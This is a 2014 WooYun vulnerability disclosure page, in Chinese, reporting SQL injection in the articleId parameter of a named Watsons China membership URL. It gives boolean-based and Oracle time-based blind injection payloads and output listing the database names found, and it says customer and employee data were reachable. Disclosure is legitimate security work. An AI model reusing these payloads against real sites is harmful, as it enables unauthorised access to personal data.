当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-070920

漏洞标题:屈臣氏SQL注射可能影响大量数据库

相关厂商:屈臣氏

漏洞作者: 紫霞仙子

提交时间:2014-08-04 11:09

修复时间:2014-09-18 11:16

公开时间:2014-09-18 11:16

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-08-04: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-09-18: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

昨天陪女朋友去屈臣氏买东西,付款时,竟然有会员卡。。。。。

详细说明:

一个单引号引发的血案。
https://www.vip.watsons.com.cn/web/SubClub_CosmeticDetail.do?articleId= (GET)
Parameter: articleId
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: articleId=6290' AND 7401=7401 AND 'GKJL'='GKJL
Type: AND/OR time-based blind
Title: Oracle AND time-based blind (heavy query)
Payload: articleId=6290' AND 6552=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USE
RS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'kIVc'='kIVc
---

漏洞证明:

available databases [12]:
[*] ANSO**
[*] CRMP**
[*] CTXS**
[*] EXFS**
[*] JEREM**
[*] MDS**
[*] OLAPS**
[*] PENN**
[*] RONN**
[*] SURV**
[*] SYS
[*] SYSTEM
表太多,就不上图了。看了下,员工信息,客户信息等等等,太多太多。。。。

修复方案:

赶紧修改吧。吓死人的节奏。

版权声明:转载请注明来源 紫霞仙子@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝